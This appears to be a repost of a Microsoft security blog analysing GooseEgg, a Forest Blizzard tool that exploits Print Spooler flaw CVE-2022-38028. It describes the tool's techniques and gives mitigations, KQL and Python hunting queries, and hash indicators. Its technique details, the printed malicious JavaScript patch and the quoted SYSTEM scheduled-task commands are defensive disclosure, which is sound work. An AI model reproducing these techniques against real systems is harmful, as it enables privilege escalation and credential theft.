Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the [URL='https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF']United States and United Kingdom governments[/URL], Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as [URL='https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/']Seashell Blizzard (IRIDIUM)[/URL] and [URL='https://www.microsoft.com/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/']Cadet Blizzard (DEV-0586)[/URL]. Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare ([URL='https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527']CVE-2021-34527[/URL] and [URL='https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675']CVE-2021-1675[/URL]), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028']CVE-2022-38028 security update[/URL] to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg. This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. We also provide additional recommendations, detections, and indicators of compromise. 
As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts. [HEADING=1]Who is Forest Blizzard?[/HEADING] Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The [URL='https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF']United States and United Kingdom governments[/URL] have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities. [HEADING=2]GooseEgg[/HEADING] Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises. [HEADING=3]Launch, persistence, and privilege escalation[/HEADING] Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. 
GooseEgg is typically deployed with a batch script, which we have observed using the names [I]execute.bat[/I] and [I]doit.bat[/I]. This batch script writes the file [I]servtask.bat[/I], which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run [I]servtask.bat[/I].

[IMG alt="Screenshot of the batch file code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-1.-Batch-file-2.webp[/IMG]
[I]Figure 1. Batch file[/I]

The GooseEgg binary—which has included but is not limited to the file names [I]justice.exe[/I] and [I]DefragmentSrv.exe[/I]—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity. The first command issues a custom return code 0x6009F49F and exits, which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the [I]whoami[/I] command.

Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “[I]wayzgoose[/I]”; for example, [I]wayzgoose23.dll[/I]. This DLL, as well as other components of the malware, is deployed to one of the following installation subdirectories, which is created under [I]C:\ProgramData[/I]. A subdirectory name is selected from the list below:

[LIST]
[*]Microsoft
[*]Adobe
[*]Comms
[*]Intel
[*]Kaspersky Lab
[*]Bitdefender
[*]ESET
[*]NVIDIA
[*]UbiSoft
[*]Steam
[/LIST]

A specially crafted subdirectory with randomly generated numbers and the format string [I]\v%u.%02u.%04u[/I] is also created and serves as the install directory.
For example, a directory that looks like [I]C:\ProgramData\Adobe\v2.116.4405[/I] may be created. The binary then copies the following driver stores to this directory:

[LIST]
[*][I]C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*[/I]
[*][I]C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*[/I]
[/LIST]

[IMG alt="Screenshot of code depicting the GooseEgg binary adding driver stores to an actor-controlled directory"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-2.-GooseEgg-binary-adding-driver-stores-to-an-actor-controlled-directory-2.webp[/IMG]
[I]Figure 2. GooseEgg binary adding driver stores to an actor-controlled directory[/I]

Next, registry keys are created, effectively generating a custom protocol handler and registering a new [URL='https://learn.microsoft.com/windows/win32/com/clsid-key-hklm']CLSID[/URL] to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. When the Print Spooler attempts to load [I]C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js[/I], it is instead redirected to the actor-controlled directory containing the copied driver packages.

[IMG alt="Screenshot of the registry key creation code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-3.-Registry-key-creation-2.webp[/IMG]
[I]Figure 3. Registry key creation[/I]

[IMG alt="Screenshot of the C: drive symbolic link hijack code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-4.-C-drive-symbolic-link-hijack-2.webp[/IMG]
[I]Figure 4. C: drive symbolic link hijack[/I]

The “[I]MPDW-constraints.js[/I]” stored within the actor-controlled directory has the following patch applied to the [I]convertDevModeToPrintTicket[/I] function:

[CODE]
function convertDevModeToPrintTicket(devModeProperties, scriptContext, printTicket) {try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {}
[/CODE]

The above patch to the [I]convertDevModeToPrintTicket[/I] function invokes the “rogue” search protocol handler’s CLSID during the call to [I]RpcEndDocPrinter[/I]. This results in the auxiliary DLL [I]wayzgoose.dll[/I] launching in the context of the Print Spooler service with SYSTEM permissions. [I]wayzgoose.dll[/I] is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code.

[HEADING=1]Recommendations[/HEADING]

Microsoft recommends the following mitigations to defend against attacks that use GooseEgg.

[B]Reduce the Print Spooler vulnerability[/B]

Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028']October 11, 2022[/URL] and updates for PrintNightmare vulnerabilities on [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675']June 8, 2021[/URL] and [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527']July 1, 2021[/URL]. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers.
Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a [URL='https://learn.microsoft.com/defender-for-identity/security-assessment-print-spooler']built-in security assessment[/URL] that tracks the availability of Print Spooler services on domain controllers.

[B]Be proactively defensive[/B]

[LIST]
[*]For customers, follow the credential hardening recommendations in our [URL='https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport?']on-premises credential theft overview[/URL] to defend against common credential theft techniques like LSASS access.
[*]Run [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode']Endpoint Detection and Response (EDR) in block mode[/URL] so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
[*]Configure [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations']investigation and remediation[/URL] in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
[*]Turn on [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus']cloud-delivered protection[/URL] in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
[/LIST]

Microsoft Defender XDR customers can turn on the following [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction']attack surface reduction rule[/URL] to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched.

[LIST]
[*][URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem']Block credential stealing from the Windows local security authority subsystem (lsass.exe)[/URL]
[/LIST]

[HEADING=1]Detecting, hunting, and responding to GooseEgg[/HEADING]

[HEADING=2]Microsoft Defender XDR detections[/HEADING]

[B]Microsoft Defender Antivirus[/B]

Microsoft Defender Antivirus detects threat components as the following malware:

[LIST]
[*]HackTool:Win64/GooseEgg
[/LIST]

[B]Microsoft Defender for Endpoint[/B]

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

[LIST]
[*]Possible exploitation of CVE-2021-34527
[*]Possible source of PrintNightmare exploitation
[*]Possible target of PrintNightmare exploitation attempt
[*]Potential elevation of privilege using print filter pipeline service
[*]Suspicious behavior by [I]spoolsv.exe[/I]
[*]Forest Blizzard Actor activity detected
[/LIST]

[B]Microsoft Defender for Identity[/B]

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.
[LIST]
[*]Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation)
[/LIST]

[HEADING=2]Threat intelligence reports[/HEADING]

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

[B]Microsoft Defender Threat Intelligence[/B]

[LIST]
[*][URL='https://security.microsoft.com/intel-profiles/dd75f93b2a771c9510dceec817b9d34d868c2d1353d08c8c1647de067270fdf8?tid=72f988bf-86f1-41af-91ab-2d7cd011db47']Actor Profile: Forest Blizzard[/URL]
[*][URL='https://security.microsoft.com/intel-explorer/articles/2005aadf?tid=72f988bf-86f1-41af-91ab-2d7cd011db47']Abuse of Windows Print Spooler for privilege escalation and persistence[/URL]
[/LIST]

[HEADING=2]Hunting queries[/HEADING]

[B]Microsoft Sentinel[/B]

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: [URL="https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy"]Discover and deploy Microsoft Sentinel out-of-the-box content from Content hub[/URL].
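Before the KQL hunting queries that follow, here is an added Python example (not code from the Microsoft post or from Microsoft) that applies the same indicators offline: the batch script names and hash, the vendor-named install directory with its [I]\v%u.%02u.%04u[/I] format string from the TTP description above, the binary hashes, the [I]\Microsoft\Windows\WinSrv[/I] scheduled task, the .js write under the driver store, and the two registry keys for the rogue CLSID and protocol handler. The Event class, the rule names and every record in SAMPLE_EVENTS are constructed for illustration; only the names, hashes, CLSID, task name and format string come from the post. It goes slightly beyond the post's process query by matching any schtasks command that names the WinSrv task, and it treats the two binary hashes and the command lines as alternatives rather than chaining them.

```python
"""Offline check of endpoint records against the GooseEgg indicators in the post.
Added example: Event, the rule names and the sample records are constructed;
the file names, hashes, CLSID, task name and format string are from the post."""
import re
from dataclasses import dataclass

# --- Indicators taken from the post -------------------------------------------
BATCH_NAMES = {"execute.bat", "doit.bat", "servtask.bat"}
BATCH_SHA256 = "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9"
BINARY_SHA256 = {  # SHA-256 -> file name, from the IoC table
    "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f": "justice.exe",
    "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5": "DefragmentSrv.exe",
    "41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aa": "wayzgoose[%n].dll",
}
ROGUE_CLSID = "{026cc6d7-34b2-33d5-b551-ca31eb6ce345}"   # compared case-insensitively
TASK_NAME = "\\microsoft\\windows\\winsrv"                # schtasks /TN value
DRIVER_STORE = "c:\\windows\\system32\\driverstore\\filerepository\\"
VENDOR_DIRS = ["Microsoft", "Adobe", "Comms", "Intel", "Kaspersky Lab",
               "Bitdefender", "ESET", "NVIDIA", "UbiSoft", "Steam"]
# Install dir C:\ProgramData\<vendor>\v%u.%02u.%04u; %02u/%04u are minimum widths,
# so the second and third fields may be longer (the post's example is v2.116.4405).
INSTALL_DIR_RE = re.compile(
    r"^c:\\programdata\\(?:" + "|".join(re.escape(v.lower()) for v in VENDOR_DIRS)
    + r")\\v\d+\.\d{2,}\.\d{4,}\\?$")


@dataclass
class Event:
    table: str    # advanced-hunting table the record came from (assumed shape)
    fields: dict  # column -> value, named as in that table

    def get(self, col):
        """Lower-cased column value ('' when absent) so every rule is case-insensitive."""
        return str(self.fields.get(col, "")).lower()


def classify(ev):
    """Return the names of the hunting rules an event matches (empty if none)."""
    hits = []
    if ev.table == "DeviceFileEvents" and ev.get("ActionType") == "filecreated":
        name, folder = ev.get("FileName"), ev.get("FolderPath")
        # Batch scripts, .save/.zip hive archives or wayzgoose*.dll directly in ProgramData
        if folder == "c:\\programdata\\" and (
            name in BATCH_NAMES
            or name.endswith((".save", ".zip"))
            or (name.startswith("wayzgoose") and name.endswith(".dll"))
            or ev.get("SHA256") == BATCH_SHA256
        ):
            hits.append("programdata_batch_or_payload")
        if INSTALL_DIR_RE.match(folder):          # versioned dir under a vendor folder
            hits.append("gooseegg_install_dir")
        if folder.startswith(DRIVER_STORE) and name.endswith(".js"):
            hits.append("driverstore_js_written")  # e.g. MPDW-constraints.js
    elif ev.table == "DeviceProcessEvents":
        for col in ("SHA256", "InitiatingProcessSHA256"):
            if ev.get(col) in BINARY_SHA256:
                hits.append("known_gooseegg_binary:" + BINARY_SHA256[ev.get(col)])
                break
        for col in ("ProcessCommandLine", "InitiatingProcessCommandLine"):
            cmd = ev.get(col)   # any schtasks /Create or /DELETE naming the WinSrv task
            if "schtasks" in cmd and TASK_NAME in cmd:
                hits.append("winsrv_scheduled_task")
                break
    elif ev.table == "DeviceRegistryEvents" and ev.get("ActionType") == "registryvalueset":
        key, vname, data = ev.get("RegistryKey"), ev.get("RegistryValueName"), ev.get("RegistryValueData")
        if ROGUE_CLSID + "\\server" in key and "(default)" in vname and ".dll" in data:
            hits.append("rogue_clsid_server_dll")   # COM server for the rogue CLSID
        if "\\protocols\\handler\\rogue" in key and "clsid" in vname and ROGUE_CLSID in data:
            hits.append("rogue_protocol_handler")   # custom "rogue..." protocol wired to it
    return hits


def hunt(events):
    """Run every rule over a batch of events; returns [(event index, [rule names])]."""
    findings = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed records (not real telemetry); the last one is benign.
SAMPLE_EVENTS = [
    Event("DeviceFileEvents", {"ActionType": "FileCreated", "FolderPath": "C:\\ProgramData\\",
                               "FileName": "doit.bat", "SHA256": BATCH_SHA256}),
    Event("DeviceFileEvents", {"ActionType": "FileCreated", "FileName": "wayzgoose23.dll",
                               "FolderPath": "C:\\ProgramData\\Adobe\\v2.116.4405"}),
    Event("DeviceFileEvents", {"ActionType": "FileCreated", "FileName": "MPDW-constraints.js",
                               "FolderPath": "C:\\Windows\\System32\\DriverStore\\FileRepository\\pnms009.inf_amd64_a7412a554c9bc1fd"}),
    Event("DeviceProcessEvents", {"InitiatingProcessSHA256": "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f",
                                  "ProcessCommandLine": "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE"}),
    Event("DeviceRegistryEvents", {"ActionType": "RegistryValueSet", "RegistryValueName": "CLSID",
                                   "RegistryKey": "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue9471",
                                   "RegistryValueData": "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"}),
    Event("DeviceRegistryEvents", {"ActionType": "RegistryValueSet", "RegistryValueName": "(Default)",
                                   "RegistryKey": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server",
                                   "RegistryValueData": "C:\\ProgramData\\Adobe\\v2.116.4405\\wayzgoose23.dll"}),
    Event("DeviceFileEvents", {"ActionType": "FileCreated", "FileName": "setup.log",
                               "FolderPath": "C:\\ProgramData\\Adobe\\Setup"}),
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].table, rules)
```

The install-directory rule is the one not present in the post's queries: it turns the format string into a pattern anchored at the ten vendor folder names, which keeps ordinary installers writing to their own ProgramData folders (the benign record) from matching.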
[B]Hunt for filenames, file extensions in ProgramData folder and file hash[/B]

[CODE]
let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]);
DeviceFileEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "FileCreated"
| where FolderPath == "C:\\ProgramData\\"
| where FileName in~ (filenames)
    or FileName endswith ".save"
    or FileName endswith ".zip"
    or (FileName startswith "wayzgoose" and FileName endswith ".dll")
    or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat
| project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName, InitiatingProcessAccountUpn
[/CODE]

[B]Hunt for processes creating scheduled tasks[/B]

The hash and command-line conditions are alternatives and belong in a single where operator; two chained where operators would require an event to match both binary hashes at once.

[CODE]
DeviceProcessEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where InitiatingProcessSHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" // hash value of justice.exe
    or InitiatingProcessSHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" or SHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" // hash value of DefragmentSrv.exe
    or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE"
    or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE"
    or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE"
    or ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
    or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE"
    or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE"
    or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE"
    or InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
| project TimeGenerated, AccountName, AccountUpn, ActionType, DeviceId, DeviceName, FolderPath, FileName
[/CODE]

[B]Hunt for JavaScript constraints file[/B]

[CODE]
DeviceFileEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "FileCreated"
| where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
| where FileName endswith ".js" or FileName == "MPDW-constraints.js"
[/CODE]

[B]Hunt for creation of registry key / value events[/B]

[CODE]
DeviceRegistryEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
| where RegistryValueName has "(Default)"
| where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll"
[/CODE]

[B]Hunt for custom protocol handler[/B]

[CODE]
DeviceRegistryEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue"
| where RegistryValueName has "CLSID"
| where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"
[/CODE]

[HEADING=2]Indicators of compromise[/HEADING]

[B]Batch script artifacts:[/B]

[LIST]
[*][I]execute.bat[/I]
[*][I]doit.bat[/I]
[*][I]servtask.bat[/I]
[*]7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9
[/LIST]

[B]GooseEgg artifacts:[/B]

[LIST]
[*][I]justice.pdb[/I]
[*][I]wayzgoose.pdb[/I]
[/LIST]

[TABLE]
[TR]
[TD][B]Indicator[/B][/TD]
[TD][B]Type[/B][/TD]
[TD][B]Description[/B][/TD]
[/TR]
[TR]
[TD]c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5[/TD]
[TD]SHA-256[/TD]
[TD]Hash of GooseEgg binary [I]DefragmentSrv.exe[/I][/TD]
[/TR]
[TR]
[TD]6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f[/TD]
[TD]SHA-256[/TD]
[TD]Hash of GooseEgg binary [I]justice.exe[/I][/TD]
[/TR]
[TR]
[TD]41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aa[/TD]
[TD]SHA-256[/TD]
[TD]Hash of [I]wayzgoose[%n].dll[/I], where %n is a random number[/TD]
[/TR]
[/TABLE]

[HEADING=2]References[/HEADING]

[LIST]
[*][URL]https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF[/URL]
[*][URL="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527"]CVE - CVE-2021-34527[/URL]
[*][URL="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675"]CVE - CVE-2021-1675[/URL]
[*][URL="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a"]Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability | CISA[/URL]
[/LIST]

[HEADING=2]Learn more[/HEADING]

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: [URL="https://aka.ms/threatintelblog"]Threat intelligence | Microsoft Security Blog[/URL].

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at [URL="https://www.linkedin.com/showcase/microsoft-threat-intelligence"]Microsoft Threat Intelligence | LinkedIn[/URL], and on X (formerly Twitter) at [URL]https://twitter.com/MsftSecIntel[/URL].

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: [URL]https://thecyberwire.com/podcasts/microsoft-threat-intelligence[/URL].
The post [URL='https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/']Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials[/URL] appeared first on [URL='https://www.microsoft.com/en-us/security/blog']Microsoft Security Blog[/URL]. [/QUOTE]